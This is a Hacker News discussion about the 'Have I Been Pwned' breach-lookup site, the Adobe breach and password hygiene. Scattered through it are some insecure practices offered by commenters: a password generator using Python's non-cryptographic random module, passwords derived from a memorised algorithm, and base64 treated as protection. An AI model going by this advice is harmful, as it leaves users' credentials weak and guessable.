I don't find any of several accounts I use on there, but did find a friend's email listed (and just notified him). I'd actually appreciate a way to query my mailing list in an automated fashion.

Did your friend have an input on the the risk/reward decision?

It's the same reason why you don't reply to spam; it confirms your email is valid. http://www.pcmag.com/article2/0,2817,2376031,00.asp

That's been the conventional wisdom for decades, but I don't actually think it's true. I wonder if anyone has done any tests.

The reply address for spam is almost certainly bogus. And I don't think it makes sense to target people who unsubscribe for more spam. They ain't likely to buy anything.

The geolocation part of that advice is a little paranoid for webmail users.

Secret, probably not. But in most cases I'm reasonably confident that each email address I use is currently only known by me, the one site I registered it with and the NSA.

I have a couple of email addresses that thanks to that address either having been sold, hacked or given away by including in the to/cc field of a mass mailing are now out in the public domain, and I get spam (and almost certainly malware attempts) on those two on a pretty regular basis. I'd prefer to not have the rest of my email addresses end up in the same situation.

well, if you decide to list it under your HN bio, then obviously, it's not :)

But it's not public information either, unless you choose to make it public.

But its a real email

You can't steal somebody's email just by knowing their address.

If you wanted to collect likely-valid email addresses to sell to spammers, this would be a good way to go about it. I doubt they are, but can understand the suspicion.

They already have 150M+ valid email addresses from the breach if they wanted to spam people.

I doubt they are too, but they should be really proving it somehow.

Did you mean to ask 'are they harvesting our emails?'.

Have you been pawned? Yes, now that you just gave us your email address to sell to Russian hackers.

Am I the only one who is reminded of the "Has your credit card number been stolen? Check here!" phishing ads?

Isn't there a better way to check for stolen addresses than to enter your email on a dodgy (hey, I followed a link on Hacker News) website? Such as calculating a hash on the client, and sending the hash for verification?

This is an impressive service (the speed, especially)...collation of different data sources into one easily accessible form is a hugely useful and underrated service. That said...there's no such thing as better security without an equal tradeoff. Here, it's now much easier (especially with the site response speed) for a third party to look up email addresses, see who they've patronized, and aggregate them into a database of less noble intent.

To check if a given email address was an Adobe/Gawker/whatever customer, you would've not only had to query every separate form but you would also not be guaranteed to get a definitive response (because some services will be ambiguous to whether you got a password wrong or whether the account exists at all). With the OP's service, with positive hits, you not only get confirmation of patronage, but knowledge that they are vulnerable, even if in a small, outdated way.

It's likely something Troy has anticipated but didn't want to outright say...In the end, knowledge is better than ignorance, and the correct response is for more rapid response to hacked victims and better security awareness. But I also wonder if there's a way to provide the OP's service with more (beneficial) obfuscation?

I disagree with your thesis; anyone with malicious intent can be assumed to already have their own copy. Even the Adobe dump is under 4gb compressed - a trivial amount of storage.

Additionally, there is a huge long tail of publicly available user databases that are not included in this site, which along with the lack of hashes makes it worthless for the purpose you envision.

It's also extremely easy to tell if an email is registered on a website if you aren't concerned about the victim being notified. You just need to attempt to either reset the password (it'll say whether the email exists) or register a new account with their email.

Whoa, slow your roll buddy. This could be really easily done by preprocessing the data and creating simple objects in redis. One object = email, sub objects of email could just be flags for the service it's on.

It's not the processing that's the bottleneck, it's the gathering and the initiative to do that gathering which is rare. For example, criminal records and notices have always been collectable and, once collectable, searchable. But the incidence of "a prospective employer googled me and found a 5 year old article of me publicly urinating in college" became more of an issue in the age of Google.

This isn't an indictment of Troy at all, just an observation (and I'm also just curious about what mitigation could be done, if any, that wouldn't severely inconvenience the end user). The security that exposed people had was security through obscurity, which is in the end, not enough security.

Mitigation would be fairly simple: instead of a web form, put up an email address that you can send a message to and get back the result.

For the last 12 years or so I've been using unique email addresses. I have a catchall domain and established patterns for giving out email addresses. Over the years I've witnessed many companies either getting hacked or selling out their mailing list. I know this because I start to receive spam to these unique email addresses.

Just this morning I discovered that Sirius XM has been hacked. Shame.

It would make an interesting project to analyze all this history that I've built up.

I am in the habit of making up email addresses on the fly when I register for things. Looking in my spam folder, in the last couple of days I've had spam to the email addresses I submitted to Adobe, Groupon and Abbey National Bank (now Santander). As people have pointed out email addresses are not secret, but if they've leaked out of these businesses' databases it's a bit worrying what else they might be leaking.

Should I Change my Password is a push service which notifies if your account is compromised and sends you an e-mail to change your credentials [0].

Cool hack btw! The only thing missing is a "What to do" link which could be more useful for folks who are not so technically savy.

[0] https://shouldichangemypassword.com/

Does anyone know the site that lists all the sites that have been compromised?

Edit: Found it, this was the one I was looking for. http://dazzlepod.com/disclosure/

I've started to sign up to sites with a unique email address based on the websites URL.

E.g. If I signed up to Myspace I would use Myspace@exampledomain.com

I have the mail server at "www.exampledomain.com" set to accept all emails under the domain so I can see if someone has passed on my details legitimately or via hacking.

Since I've started about 12 months ago I've not found any cross pollination which seems a good sign for the industry in general.

It also adds a layer of security as your sign-up email changes for different websites if you use the same password across several.

Is this a clever way to harvest email addresses? :)


    Passwords: I’m not storing them. Nada. Zip. I just don’t need them 
    and frankly, I don’t want the responsibility either. This is all 
    about raising awareness of the breadth of breaches.

Considering that this is made my Troy Hunt, I would trust it. He has built up enough reputation in my mind.

They should have instead used digest to store and transfer the email addresses.

I have a question...how big is the backend to this site? Its average response is about 100ms, which, to me, seems impressively fast considering the number of bulk records and the amount of concurrent traffic that such a site is getting. Besides the obvious indexing of the email field...anything special behind the curtains? Lots of machines? Something else besides a simple key lookup? Or am I just vastly overestimating how slowly a properly maintained DB will respond in such a situation?

He discusses a little in the intro post[1], but indicates he'll be writing a technical detail post too.

[1] http://www.troyhunt.com/2013/12/introducing-have-i-been-pwne...

I think you are overestimating. This is not so large and unique key searches are blazing fast in pretty much any DB under the sun.

This might answer your question: haveibeenpwned.com/HowFastIsAzureTableStorage/?email=foo@foo.com

I'm writing up how the back end is done and will post it in the next day or two, IMHO it's massively impressive but also very easy :)

Looking forward to it! The raising of awareness about security is alone pretty awe-inspiring, so the fact that I'm equally piqued by such technical details as the site's backend is really saying something about the impressiveness of the execution

The email I used for Adobe was caught in their breach. Good news? I not only used a different password, but I use a new email for almost every site. I have a wildcard email and Adobe is the only site I've ever used that particular email on. Meanwhile, my yahoo account (which I basically use for nothing) is not listed as being exposed, but I logged into that recently and had a note that it had recently been logged into from India. Good golly.

That Adobe got hacked isn't your fault - that you chose a weak password and reused it, is.

Showing a few more numbers might help more people realize that their passwords aren't actually unique, creative or safe. The data that came out of the Adobe hack is pretty interesting, and the results are much more tangible than "oh no, pwned!".

Something like:

"Your password was used by 8290 people.

Furthermore, 2615 persons gave a plain text hint as to what the password might be."

"How to collect e-mail addresses" - Exercise 1

Feature request: Could you strip the dots from user input if the email address is @gmail.com, and similarly strip the dots from the records of pwned email addresses? Gmail usernames are dot agnostic, and I sometimes use xyz@gmail.com, x.yz@gmail.com, etc. This makes it hard to use the tool to check of my Gmail has been pwned. (Also, I assume you don't do this already).

This is what caused me to start using a password manager. I always knew that I should, but it seemed to be a major pain, if I had known how convenient it is, I would have switched to it long back.

Instead I first started off with my own "password generator":

    import random
    import string
    import sys

    def generate_random(length, simple):
        chars = string.printable[:-6] if not simple else string.letters + string.digits
        return ''.join(random.sample(chars, 1)[0] for x in range(length))

    def username():
        return generate_random(length=4, simple=True)

    def password(length):
        return generate_random(length=length, simple=False)

    if __name__ == '__main__':
        length = 6
        if len(sys.argv) > 1 and sys.argv[1].isdigit():
            length = int(sys.argv[1])

        for i in range(20):
            print username(), password(length)

I'd like to see a site which validates whether or not your password is exposed. Users should assume that it is exposed, but it would be nice to know wether or not it's floating around in some list somewhere.

Problem is, I can't think of a computationally efficient way to perform this check securely. I could see handing the user an nonce, asking them to manually hash their password concatenated with the nonce, and then comparing the user's response with a list you've hashed yourself, but I'm sure this won't scale well.

Is there such a thing as a secure, or "blind", bloom filter which allows a user to search for some chunk of text without exposing to the world what that chunk of text is?

Edit: Hmm, this might be what I'm looking for: http://www.tdp.cat/issues/tdp.a015a09.pdf

It's possible to write a tool that will figure out all algorithms/salts used by compromised sites, and then hash your password with those algorithms/salts and see if that hash appears in the compromised password files.

Most of the compromised sites use worthless password storage mechanisms, like unsalted hashes or plaintext, so this level of sophistication is mostly unnecessary. For example, say you used the password "foobar".

md5 that:

    $ echo -n "foobar" | md5sum
    3858f62230ac3c915f300c664312c63f  -
Then Google for 3858f62230ac3c915f300c664312c63f. The first result's snippet is:

    = rainbow.lookup('3858f62230ac3c915f300c664312c63f') # => 'foobar' ...
There you go. Don't use "foobar" as your password.

You've got me thinking about how I store passwords. I have in the past done:

    ~ $ echo -n "mypassword" | base64
How would one combine the above with md5? on OS X is it `md5 -s <string>`

So basically base64 'mypassword', then md5 the base64 result.

Well, I wasn't joking, but I didn't realize md5 was as vulnerable as Atwood says it is. SHA-2 or Bcrypt.

Sorry, that was overly snarky and that wasn't warranted.

Are you talking about how you store your own passwords so that you may retrieve them in order to log into some service, or are you talking about how you store user credentials as part of an application?

If you're storing your own passwords, just use a well-rated password locker program, or store them in a TrueCrypt volume or similar. If you're storing your users' passwords... well, don't -- store the hash like that Atwood article suggests.

To your initial question, if you need to use the output of one program as an argument to another program, you can wrap it in backticks:

    md5 -s `echo -n please_dont_actually_do_this | base64`
But really there's no benefit to converting it to base64 before you hash.

no, I am just storing my passwords in a text file and I don't want to do it plaintext, but I also don't want to have to encode the whole text file and have to decode it first to use it. Just make it more complicated if someone opens it.

Thanks for the reminder of ticks (`) I was accidentally using single quotes (')

Ah, then I stand by my original advice. Keep in mind, base64 encoded ascii/UTF-8/whatever encoding you like is still plaintext. If you want to be secure, use a password locker program or store them in a text file inside of a small encrypted volume which you unmount as soon as you're done with it (TrueCrypt is nice for this).

But if you don't care about them actually being secure, party on...

Aside from backticks, you can also use the dollar quote (I'm sure this has a better name):

   $(some_command some arguments | some_other_command)
Finally, back to the original "how do I combine this with md5" question, you don't, as that won't do what you want. That is, you want to be able to recover the plaintext, but cryptographic hashes are designed specifically to make that practically impossible.

nothing wrong with md5 itself here, just the way it's being used.

if you replace it with sha-2 you'd have the exact same problem (bcrypt is more than a simple hash function).

Many comments suggest to use password managers like lastpass, 1pass, etc. But I think that may not be a good idea: a. What if lastpass/1pass is compromised? b. You have to login to retrieve your password, which is inconvenient.

I think the best solution to this is to make sure your passwords ONLY exist in your head, nowhere else. And to NOT reuse your passwords, you have to create a unique and reasonably strong one for each service.

So how do I remember all these unique and strong passwords? I create an algorithm which takes two parameters as inputs: my username and the domain of the service, it will do some simple manipulation of the inputs and give me a reasonably strong password. Hence, all you need to do is to remember your algorithm and use it to compute your password when you need it. Of course, you want the algorithm simple enough to be done in your head.

For cases like these is why you should NEVER use the same password in different sites. While my email is in the Adobe list the password I used there is unique so I don't bother too much-other that I've lost any trust in Adobe and I'll think twice about doing any business with them in the future.

I got an email from LastPass about being caught up in the Adobe breach and it took me one evening, two cups of coffee, and a lot of patience to switch all my passwords to auto-generated strings and enable 2-factor where I could.

Only now in this fleeting moment do I realize that i'm now tied to LastPass's ecosystem.

Feature request: allow wildcard searches, with a sufficiently large literal starting prefix, to return a simple "zero" or "more-than-one" result.

EG: "john*@gmail.com"

I'd then feel better about typing my address into a random site, and be able to check site-specific variants of my address more easily.


For every different site I use a different email address, so I know when something fishy is going on. so I might have hackernews@mydomain.com. The form wont accept just @domainname.com :(

Also, for those of us that use aliases for each site we visit... it would allow a quick lookup of them.

Nice been looking for a tool like this, so I didn't have to download each of these hacks lists

This database includes emails that were simply listed in these data breaches. Newer Adobe account emails were put in as entries in the database, but their associated password/hint data was not. There were quite a large number of these in the leaked db, including some of mine. I had to download the whole thing and search to realize that the only information revealed/stored was the email address.

Idea: Write a service that you pass the unsalted hash to (only salted hashes in the DB please), and the email address and hash type. Stop people if their hash matches any previous ones.

Obviously this would stop people providing the same password for all services... But might creep some people out!

Would hopefully highlight how insecure/guessable non salted hashes are. Does anyone know best practice for doing things like this?

And lets also not forget, this why you should always use http://www.mailinator.com/ instead of your real address.

Lots of sites block mailinator, but then use one of their aliases – foobar@spamgoes.in ... then check http://foobar.mailinator.com/

Is this a trap to build a mailing list?

I tried a bunch of fake hotmail emails and 90% of them are "pwned". Very suspicious to say the least.

Aside from those who enter fake addresses or addresses they do not control, the folks who set up websites like this can also connect each email address with an IP address. This might be useful, e.g., for determining geolocation. It is sad to think that naive users are falling for this every time a data breach makes the news, handing over their email address to total strangers.

This sounds as much of a trap as do the websites that tells "how secure is your password" to use them to build dictionaries for brute force.

Welp, I now know my login was apart of the Adobe leak.

Shouldichangemypassword.com sent me an email a few weeks ago saying my email address was found in a leaked database, although they couldn't say which one. Considering I have more than 100 accounts which use that particular email address, it didn't help at all. This site did!

Is it possible to apply the same hash function to a string as it’s done in the users database of the Adobe breach? I think it is 3DES. I’ve been able to obtain my (hashed) credentials, but as it seems my account is deactivated at adobe.com (probably due to inactivity?), so I’m not able to test which password I used. :(

The key is not publicly known. Some passwords have been recovered, as discussed here:


It would be irresponsible for anybody to share the key, it would reveal all the passwords.

I got my Adobe account pwned, apparently.

I didn't even know I had an Adobe account, I don't use any Adobe products.

Weird. Flagged a hotmail addy I rarely use as having been compromised in the Adobe breach, but I don't recall ever using that address with Adobe and when I plug it into Adobe to reset the password for it, it says that they have no account associated with that address.

This site has done a good job highlighting just how badly Adobe screwed up with their data breach. Everyone in my office had their email address show up from the Adobe breach (including mine) and based on the comments, everyone else mostly did as well. Whoa.

This is a great service -- I've already shared it with my colleagues. But doesn't this tool now make it easier for those with a grudge to find their enemies' compromised accounts? ...all the more reason to change your passwords...

I always have an uncomfortable feeling these exist purely to harvest email addresses. Not that it stopped me using it, the results are of interest and my email address is already plastered all over the place.

My gmail was fine but my yahoo mail is compromised, but i actually changed the password a couple weeks back because yahoo asked me, so worked out fine. I have not used adobes services for over a year now.

You suck Adobe.

It looks like the guy having mark@facebook.com has an Adobe account !

Seems pretty similar to this one from a year or two back...


For some reason I always forget I have an Adobe account.

Funny that example@example.com has been pwned twice.

example.com is a special domain, not to be used for any legit purpose, so good luck hacking that!


I'm aware, that's why I wanted to see if people were using it for their accounts.

john@doe.com and fuck@off.com can beat that - pwned three times each. See also noneofyour@business.com.

I find it amusing that my real email address are not compromised but all of my fake ones for signing up for various things are compromised.

Is it possible to find the actual data? I found an old email in there, would be interesting to checkout what lame hint I used.

It says I haven't, yet if I google my email and an older password I used to use, I find it listed on some Russian forum.

You should also include dates alongside the breach. Just so that one knows, if they have taken corrective action after that

For cases like these are why you should NEVER

Never finish your comments?

Adobe got me.

Does lastpass work great for checking banking on cellphones and other logins that would require a cut and paste on a desktop?

I use lastpass on my android phone. I use 2 factor with an nfc yubikey.


Yup, works great, I've been using it for over a year. To login to banking on your phone, you first go to the Lastpass app, login to that, then copy the password to your bank, open their app, and paste the password in. Lastpass for Android also now has a notification that stays up while you're logged in, to remind yourself to log back out when you're done.

That's the way that it worked when I first started using it, but am I the only person using the full Lastpass browser these days? It's far more convenient than the old Authenticator -> Lastpass -> Browser authentication workflow that I had to use before the upgrade.

They have a mobile site, and if you get the premium subscription ($12/year?) you can use their mobile apps - I use the iOS and Windows Phone apps and both are very smooth. (They also have Android and Blackberry).

They could just query against the MD5 of your email instead, if it's a match they already had your email anyways :)

This is very cool. I didn't even think of my adobe account when the breach happened, since I used it so long ago.

If you want to see what it looks like when your email address has been pwned I tried lol@lol.com and got back 4 hits.

The real zinger - when you enter your email address to check, they store it and steal your identity :P

This site is BS, I put in a BS email still say I was part of a adobe password breach!!!

even if it was a BS email, it could have been a part of the db. you'd be surprised at the kind of BS email address in the adobe dump. there are ~1K people who provided an @a.com email address.

I got three hits for president@whitehouse.gov.

People put in bogus addresses when they register for things. I have a domain that is similar to a common mash on the keyboard, and I get a steady stream of backscatter from people signing up to things with crap@keyboardmash.org.

asdf.com? qwerty.org? Please don't leave us hanging :P

Pwned on amazon too. Thankfully it was a demo account, with an old email and password.

Gmail also tells you you'r Last account activity at the bottom of the page.

We send emails to all of our customers who end up in these breaches as well.

This looks like a brilliant way for spammers to collect e-mail addresses...

Pawned on Adobe's website 2.

My spam url and my real one, goddamned.

how do i know this isn't a scam for collecting e-mail addresses for spam purposes?

Adobe needs to be extinguished.

Any plans to add LinkedIn?

I thought emails weren't disclosed in the LinkedIn breach? You can check your password over at https://lastpass.com/linkedin/

Where's the API?

God damn it Adobe!

enter your email to get pwned


Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | DMCA | Apply to YC | Contact